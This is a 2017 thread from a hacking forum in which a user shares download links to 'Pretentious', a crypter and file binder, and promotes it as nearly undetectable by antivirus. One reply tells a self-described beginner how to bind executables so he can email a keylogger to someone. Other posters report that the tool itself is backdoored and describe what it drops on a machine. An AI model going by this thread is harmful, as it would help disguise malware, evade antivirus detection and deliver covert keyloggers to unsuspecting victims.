Sinisterly
[*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.li/Forum-Hacking-Tools)
+--- Thread: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] (/Thread-UNITY-Pretentious-Crypter-FUD-FILE-BINDER)



[*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - CrackKilla - 11-29-2017

Found this on another forum, posting it here.


Hello,

Yesterday, some user posted a crypter / file binder called as 'Pretentious' on this forum.
Sadly, it was backdoored.

I downloaded it and removed the extra binded file to get the clean version.
However, I am not sure, I have doubts if it might be double binded, so please use it at your own risk. VM or Sandbox the best.
I am not a coder or a programmer so I am not the best out there.

[Image: pretentious.png]

However, one thing that did surprise me was the scan results of the file I crypted.

I crypted a shitty ass file which had 29/66 detections.

Before crypt:
https://www.virustotal.com/#/file/46d842f6651989786d60b9cfe9647e9ecaf65fc89afc0a992ff9892d5c9777b7/detection

After crypt:
[Image: img.png]

This crypter is pretty much FUD, 2/36, that's what most paid crypters give these days.

Also, do not scan your crypted file on VirusTotal, unless you want your file to get detected ofcourse.


Quote:https://www.sendspace.com/file/qsh5oz
https://userscloud.com/5sqok8c0tzk5
https://openload.co/f/vKXDH70dw5A/Pretentious.rar



RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - mothered - 11-29-2017

(11-29-2017, 01:44 AM)CrackKilla Wrote: This crypter is pretty much FUD, 2/36, that's what most paid crypters give these days.

I understand your point, but It either Is or Isn't FUD. This Is more so "UD"- Undetected and not Fully Undetected.

That aside, I appreciate your effort In contributing this In a safer manner. Added to my list of VM tasks.
EDIT: Quote tags fixed.


RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - Bish0pQ - 11-29-2017

Thank you for this, I'll be looking into this, there is also a missing scan for the tool itself. If this works that'd be great since I know someone who's looking for this.


RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - Amosdan - 12-12-2017

Well, I'm Just a beginner in all these but I need to send and email attached with a keylogger to someone.
Please, Can you please point me on the right direction?


RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - mothered - 12-12-2017

(12-12-2017, 02:47 PM)Amosdan Wrote: Well, I'm Just a beginner in all these but I need to send and email attached with a keylogger to someone.
Please, Can you please point me on the right direction?

If your Intention Is to bind 2 executable files, you can use the Windows native binder named "IExpress".

Simply enter that In the Windows search function (no quotes) and proceed from there. Rather than taking over this thread, If you have further questions or concerns, please create a thread.


RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - UndefeatedHades - 01-02-2018

Anyone can assist with the "Payload Option" @mothered ??


RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - mahsat418 - 01-03-2018

Have backdoor this tool ,dont download this ...


RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - mothered - 01-03-2018

(01-03-2018, 06:28 PM)mahsat418 Wrote: Have backdoor this tool ,dont download this ...

Please post your findings to support your claim.

I completely forgot about this tool. I'll run It In my VM later today.


RE: [*UNITY*] Pretentious Crypter [FUD] [FILE BINDER] - S3xySmurf - 01-03-2018

Drops files in Appdata/Roaming/Pretentious/Pretentious.exe

Drops a smaller copy of itself under AppData/Local/Temp/Pretentious.exe 900KB plus a copy of svhost.exe in the same directory.

https://www.hybrid-analysis.com/sample/4b786e79870aa73d2f52ca08fe489f566a9e157af01f49a778d71bd1354e53a4?environmentId=100

I'd run this in VM only has a few suspicious indicators in my opinion but I don't have the time to dig deeper.

After a quick check in a VM seems heavily backdoored, svhost re-opens after timeout closes and your left with a cmd prompt on the screen, I haven't dived any deeper.